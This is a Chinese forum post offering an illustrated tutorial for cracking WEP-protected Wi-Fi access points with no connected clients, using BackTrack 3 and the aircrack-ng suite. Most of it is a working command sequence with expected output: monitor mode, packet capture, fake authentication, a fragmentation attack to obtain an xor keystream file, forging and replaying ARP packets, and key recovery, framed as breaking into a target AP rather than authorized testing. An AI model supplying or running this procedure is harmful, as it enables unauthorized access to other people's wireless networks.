马上注册,结交更多好友,享用更多功能,让你轻松玩转永城人论坛
您需要 登录 才可以下载或查看,没有账号?我要注册
x
BT3下破解无客户端wep简明教程(图文版)
1.装备: dell D410笔记本、linksys wusb54g v4 (加装12db 八木定向天线)、bt3 usb 系统 (如图)file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image002.jpg file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image004.jpgfile:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image005.jpgfile:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image007.jpg
2.启动BT3,打开一个窗口,输入ifconfig –a 查看网卡 (顺便记下自己网卡的mac,后面要用到)
我的网卡是rausb0
再输入ifconfig –a rausb0加载usb网卡驱动
3.输入airmon-ng
start rausb0
6
激活网卡的Monitor模式
后面的6 是你要破解ap 的工作频道 根据实际,换成你破解的ap的实际工作频道(下同)。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image009.jpg
4.输入抓包命令,抓包并查看你要破解的ap的essid
mac
输入命令
airodump-ng --ivs -w name -c 6 rausb0
,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac ,并记下ap的essid 和mac。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image011.jpg
5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap
输入
aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0
这时,系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image013.jpg
6.输入aireplay-ng
-5 -b ap的mac -h 自己网卡的mac rausb0
来获得xor文件
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image015.jpg
如果一切顺利,系统将回显
Use this packet ?
输入y
回车,将得到一个至关重要的xor文件。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image017.jpg 再输入ls
查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image019.jpg
7.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
其中,–l中的l是L的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image021.jpg
系统回显:Wrote packet to: mrarp
8.输入aireplay-ng -2 –r mrarp
-x 1024 rausb0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image023.jpg
输入y
回车 攻击开始
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image025.jpg
这时,前面的抓包窗口上的data将迅速增加。
file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image027.jpg
到数据增加到3万以上时,另开窗口,启动
aircrack-ng -n 64 -b ap的mac name-01.ivs
其中
64 是64位密码,如果是128位,换成128即可。file:///C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/msohtml1/02/clip_image029.jpg
另外,假如你用的是BT2系统,方法一样,但要对系统中的Aircrack进行升级。因破解环境往往无法在线升级bt2,故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘,我是放在c盘的根目录下。
用usb bt2 系统启动bt2,进入界面后,打开一个窗口,
输入cd /mnt
输入再输入 ls
这样你就能看到你的硬盘名 一般是sda1 hda1 或hdc1(我的就是hda1)
再输入
cd /mnt/hda1 或者cd /mnt/hdc1, 就是进入你的c盘根目录。
再输入
tar -xf aircrack-ng-0.9.1.tar.gz
再输入
cd aircrack-ng-0.9.1
再输入
make clean && make && make install
这样,你就可以直接在新版本下破解了,方法同上。 |